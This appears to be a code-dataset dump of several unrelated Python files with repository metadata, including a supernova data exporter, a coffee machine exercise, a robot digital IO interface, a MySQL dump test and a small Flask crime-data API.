sids.append(sid)
spectra.append(spectrum(wave=w, flux=f, fluxed=fluxed,
name="Spectrum MJD={:.1f}".format(t)))
dates.append(t)
snobj.sdata = timespec(snobj, dates, spectra)
snobj.sdata.sids = sids
if full_data:
# make a dictionary of the remaining OSC meta data and make it a member
# variable
snobj.osc_meta = {}
for key in d.keys():
if key not in ['name','redshift','ra','dec','sources','photometry',
'spectra']:
snobj.osc_meta[key] = d[key]
return(snobj,'Success')
def to_osc(s, ref=None, bibcode=None, source=1):
'''Given a supernova object, s, output to JSON format suitable for upload to
the OSC.'''
data = {s.name:{"name":s.name}}
if ref or bibcode:
sources = [dict(bibcode=bibcode, name=ref, alias=str(source))]
data['sources'] = sources
phot = []
for filt in s.data:
for i in range(len(s.data[filt].MJD)):
datum = dict(survey='CSP', observatory='LCO')
datum.update(CSP_systems(filt, s.data[filt].MJD[i]))
datum['time'] = "{:.3f}".format(s.data[filt].MJD[i])
datum['u_time'] = "MJD"
datum['magnitude'] = "{:.3f}".format(s.data[filt].mag[i])
flux,eflux = s.data[filt].flux[i],s.data[filt].e_flux[i]
datum['flux'] = "{:.5f}".format(flux)
datum['u_flux'] = "s^-1 cm^-2"
datum['e_flux'] = "{:.5f}".format(eflux)
datum['e_upper_magnitude'] = "{:.3f}".format(
-2.5*log10((flux-eflux)/flux))
datum['e_lower_magnitude'] = "{:.3f}".format(
-2.5*log10(flux/(flux+eflux)))
datum['source'] = "{}".format(source)
phot.append(datum)
data['photometry'] = phot
return json.dumps(data, indent=4)
| 0
| 0
| 0
| 0
| 0
| 476
| 0
| -3
| 23
|
b838c3e4fd3bce1a2cc716eb2ba8a849168a9356
| 744
|
py
|
Python
|
Day 15 - OOP/main.py
|
secureterminal/100-Days-of-Code
|
04383ae541938d8a551b5aac9a0dad3348a6ef23
|
[
"MIT"
] | 1
|
2022-01-28T13:55:39.000Z
|
2022-01-28T13:55:39.000Z
|
Day 15 - OOP/main.py
|
secureterminal/100-Days-of-Code
|
04383ae541938d8a551b5aac9a0dad3348a6ef23
|
[
"MIT"
] | 1
|
2022-02-02T00:13:18.000Z
|
2022-02-03T11:32:53.000Z
|
Day 15 - OOP/main.py
|
secureterminal/100-Days-of-Code
|
04383ae541938d8a551b5aac9a0dad3348a6ef23
|
[
"MIT"
] | 2
|
2022-02-07T20:49:36.000Z
|
2022-02-19T21:22:15.000Z
|
from menu import Menu
from coffee_maker import CoffeeMaker
from money_machine import MoneyMachine
money_machine = MoneyMachine()
coffee_maker = CoffeeMaker()
menu = Menu()
coffee_maker.report()
money_machine.report()
coffee_machine_is_on = True
while coffee_machine_is_on:
choices = menu.get_items()
user_order = input(f'Please choose a coffee: ({choices})>>> ')
if user_order == 'off':
coffee_machine_is_on = False
elif user_order == 'report':
coffee_maker.report()
money_machine.report()
else:
drink = menu.find_drink(user_order)
if coffee_maker.is_resource_sufficient(drink) and money_machine.make_payment(drink.cost):
coffee_maker.make_coffee(drink)
| 24.8
| 97
| 0.717742
|
from menu import Menu, MenuItem
from coffee_maker import CoffeeMaker
from money_machine import MoneyMachine
money_machine = MoneyMachine()
coffee_maker = CoffeeMaker()
menu = Menu()
coffee_maker.report()
money_machine.report()
coffee_machine_is_on = True
while coffee_machine_is_on:
choices = menu.get_items()
user_order = input(f'Please choose a coffee: ({choices})>>> ')
if user_order == 'off':
coffee_machine_is_on = False
elif user_order == 'report':
coffee_maker.report()
money_machine.report()
else:
drink = menu.find_drink(user_order)
if coffee_maker.is_resource_sufficient(drink) and money_machine.make_payment(drink.cost):
coffee_maker.make_coffee(drink)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0
|
fc8a2c85d00bef3bd3bd075b7a046a93e1e9c68c
| 4,269
|
py
|
Python
|
intera_interface/src/intera_interface/digital_io.py
|
thinclab/intera_sdk
|
556de67a88049687404734404e16b147943cde3c
|
[
"Apache-2.0"
] | 38
|
2017-01-20T15:44:22.000Z
|
2022-01-28T15:15:40.000Z
|
intera_interface/src/intera_interface/digital_io.py
|
thinclab/intera_sdk
|
556de67a88049687404734404e16b147943cde3c
|
[
"Apache-2.0"
] | 47
|
2016-12-16T19:41:03.000Z
|
2022-03-21T14:04:04.000Z
|
intera_interface/src/intera_interface/digital_io.py
|
thinclab/intera_sdk
|
556de67a88049687404734404e16b147943cde3c
|
[
"Apache-2.0"
] | 52
|
2017-02-03T13:26:23.000Z
|
2021-03-16T14:25:51.000Z
|
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| 29.853147
| 79
| 0.606699
|
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import rospy
import intera_dataflow
from intera_core_msgs.msg import (
DigitalIOState,
DigitalOutputCommand,
)
class DigitalIO(object):
"""
DEPRECATION WARNING: This interface will likely be removed in
the future. Transition to using the IO Framework and the wrapper
classes: gripper.py, cuff.py, camera.py
Interface class for a simple Digital Input and/or Output on the
Intera robots.
Input
- read input state
Output
- turn output On/Off
- read current output state
"""
def __init__(self, component_id):
"""
Constructor.
@param component_id: unique id of the digital component
"""
self._id = component_id
self._component_type = 'digital_io'
self._is_output = False
self._state = None
self.state_changed = intera_dataflow.Signal()
type_ns = '/robot/' + self._component_type
topic_base = type_ns + '/' + self._id
self._sub_state = rospy.Subscriber(
topic_base + '/state',
DigitalIOState,
self._on_io_state)
intera_dataflow.wait_for(
            lambda: self._state is not None,
timeout=2.0,
timeout_msg="Failed to get current digital_io state from %s" \
% (topic_base,),
)
# check if output-capable before creating publisher
if self._is_output:
self._pub_output = rospy.Publisher(
type_ns + '/command',
DigitalOutputCommand,
queue_size=10)
def _on_io_state(self, msg):
"""
Updates the internally stored state of the Digital Input/Output.
"""
new_state = (msg.state == DigitalIOState.PRESSED)
if self._state is None:
self._is_output = not msg.isInputOnly
old_state = self._state
self._state = new_state
# trigger signal if changed
if old_state is not None and old_state != new_state:
self.state_changed(new_state)
@property
def is_output(self):
"""
Accessor to check if IO is capable of output.
"""
return self._is_output
@property
def state(self):
"""
Current state of the Digital Input/Output.
"""
return self._state
@state.setter
def state(self, value):
"""
Control the state of the Digital Output. (is_output must be True)
@type value: bool
@param value: new state to output {True, False}
"""
self.set_output(value)
def set_output(self, value, timeout=2.0):
"""
Control the state of the Digital Output.
Use this function for finer control over the wait_for timeout.
@type value: bool
@param value: new state {True, False} of the Output.
@type timeout: float
@param timeout: Seconds to wait for the io to reflect command.
If 0, just command once and return. [0]
"""
if not self._is_output:
raise IOError(errno.EACCES, "Component is not an output [%s: %s]" %
(self._component_type, self._id))
cmd = DigitalOutputCommand()
cmd.name = self._id
cmd.value = value
self._pub_output.publish(cmd)
if not timeout == 0:
intera_dataflow.wait_for(
test=lambda: self.state == value,
timeout=timeout,
rate=100,
timeout_msg=("Failed to command digital io to: %r" % (value,)),
body=lambda: self._pub_output.publish(cmd)
)
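if __name__ == '__main__':
    # Illustrative usage sketch only (not part of the original module). The component id
    # below is hypothetical, and a running ROS master plus a robot publishing
    # /robot/digital_io/<component_id>/state are assumed.
    rospy.init_node('digital_io_example')
    example_io = DigitalIO('example_component')   # hypothetical component id
    print("current state: {0}".format(example_io.state))
    if example_io.is_output:
        example_io.set_output(True, timeout=2.0)  # command ON and wait for the state to echo back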
| 0
| 465
| 0
| 3,049
| 0
| 0
| 0
| 44
| 115
|
07a2a8bad2c82e238b18e385c8b1b2d9e1a12999
| 2,535
|
py
|
Python
|
tests/models/mysql_dumps_test.py
|
ywlianghang/mysql_streamer
|
7fc85efaca3db6a387ea4b791632c2df2d04cb3e
|
[
"Apache-2.0"
] | 419
|
2016-11-17T18:41:47.000Z
|
2022-03-14T02:50:02.000Z
|
tests/models/mysql_dumps_test.py
|
ywlianghang/mysql_streamer
|
7fc85efaca3db6a387ea4b791632c2df2d04cb3e
|
[
"Apache-2.0"
] | 19
|
2016-11-30T18:09:00.000Z
|
2019-04-02T06:20:02.000Z
|
tests/models/mysql_dumps_test.py
|
ywlianghang/mysql_streamer
|
7fc85efaca3db6a387ea4b791632c2df2d04cb3e
|
[
"Apache-2.0"
] | 90
|
2016-11-23T06:26:20.000Z
|
2022-01-22T09:24:42.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
| 28.483146
| 77
| 0.672189
|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
from replication_handler.models.mysql_dumps import MySQLDumps
@pytest.mark.itest
@pytest.mark.itest_db
class TestMySQLDumps(object):
@pytest.fixture
def cluster_name(self):
return 'yelp_main'
@pytest.fixture
def test_dump(self):
return 'This is a test dump'
@pytest.yield_fixture
def initialize_dump(
self,
sandbox_session,
cluster_name,
test_dump
):
assert MySQLDumps.dump_exists(sandbox_session, cluster_name) is False
test_mysql_dump = MySQLDumps.update_mysql_dump(
session=sandbox_session,
database_dump=test_dump,
cluster_name=cluster_name
)
sandbox_session.flush()
assert MySQLDumps.dump_exists(sandbox_session, cluster_name) is True
yield test_mysql_dump
def test_get_latest_mysql_dump(
self,
initialize_dump,
cluster_name,
test_dump,
sandbox_session
):
new_dump = 'This is a new dump'
retrieved_dump = MySQLDumps.get_latest_mysql_dump(
session=sandbox_session,
cluster_name=cluster_name
)
assert retrieved_dump == test_dump
MySQLDumps.update_mysql_dump(
session=sandbox_session,
database_dump=new_dump,
cluster_name=cluster_name
)
returned_new_dump = MySQLDumps.get_latest_mysql_dump(
session=sandbox_session,
cluster_name=cluster_name
)
assert returned_new_dump == new_dump
MySQLDumps.delete_mysql_dump(
session=sandbox_session,
cluster_name=cluster_name
)
dump_exists = MySQLDumps.dump_exists(
session=sandbox_session,
cluster_name=cluster_name
)
assert not dump_exists
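Because the test class above is tagged with custom itest / itest_db markers, it is presumably excluded from plain unit-test runs; assuming those markers are registered in the project's pytest configuration and a sandbox database is available, it would be selected with something like:

    pytest -m "itest and itest_db" tests/models/mysql_dumps_test.py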
| 0
| 1,756
| 0
| 0
| 0
| 0
| 0
| 32
| 69
|
0ec5fc82f6363d39869fe20305aa7077435f30d4
| 1,232
|
py
|
Python
|
WORK/working/crime_vis/crime.py
|
jessicagtz/WorkingFolder
|
4791618e1ec12b9cc38a6ceb1ff03bab1799b0bc
|
[
"MIT"
] | null | null | null |
WORK/working/crime_vis/crime.py
|
jessicagtz/WorkingFolder
|
4791618e1ec12b9cc38a6ceb1ff03bab1799b0bc
|
[
"MIT"
] | null | null | null |
WORK/working/crime_vis/crime.py
|
jessicagtz/WorkingFolder
|
4791618e1ec12b9cc38a6ceb1ff03bab1799b0bc
|
[
"MIT"
] | 1
|
2018-12-06T21:33:44.000Z
|
2018-12-06T21:33:44.000Z
|
# import dependencies
from flask import Flask
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine
# database setup using automap
engine = create_engine("sqlite:///chi_db.sqlite")
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save references to the tables
AllCrime = Base.classes.all_crime
# Create our session (link) from Python to the DB
session = Session(engine)
# initialize Flask
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///chi_db.sqlite"
if __name__ == "__main__":
app.run(debug=True)
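The automap setup above only succeeds if chi_db.sqlite actually contains an all_crime table. A quick sketch for confirming what was reflected, assuming the same SQLite file and the same SQLAlchemy version as the code above:

from sqlalchemy import create_engine, inspect
from sqlalchemy.ext.automap import automap_base

engine = create_engine("sqlite:///chi_db.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)

# List the reflected table names and the mapped classes automap generated for them.
print(inspect(engine).get_table_names())
print(list(Base.classes.keys()))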
| 27.377778
| 117
| 0.730519
|
# import dependencies
from flask import Flask, jsonify, render_template, request, redirect
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func, inspect
import pandas as pd
import numpy as np
import datetime as dt
# database setup using automap
engine = create_engine("sqlite:///chi_db.sqlite")
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# Save references to the tables
AllCrime = Base.classes.all_crime
# Create our session (link) from Python to the DB
session = Session(engine)
# initialize Flask
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///chi_db.sqlite"
@app.route("/crimehistory")
def crime_dict():
    # Query id, crime group, year, and crime count for every record.
    results = session.query(
        AllCrime.id, AllCrime.crimeGroup, AllCrime.year, AllCrime.nunCrimes
    ).all()
    records = []
    for result in results:
        records.append({
            "year": result.year,
            "id": result.id,
            "crimeGroup": result.crimeGroup,
            "nunCrimes": result.nunCrimes
        })
    return jsonify(records)
if __name__ == "__main__":
app.run(debug=True)
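A quick way to exercise the /crimehistory route without starting the development server, assuming the module above is saved as crime.py and the SQLite file is present; this is only a sketch:

from crime import app  # assumes the file above is importable as crime

with app.test_client() as client:
    response = client.get("/crimehistory")
    print(response.status_code)
    print(response.get_json()[:3])  # first few records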
| 0
| 449
| 0
| 0
| 0
| 0
| 0
| 55
| 95
|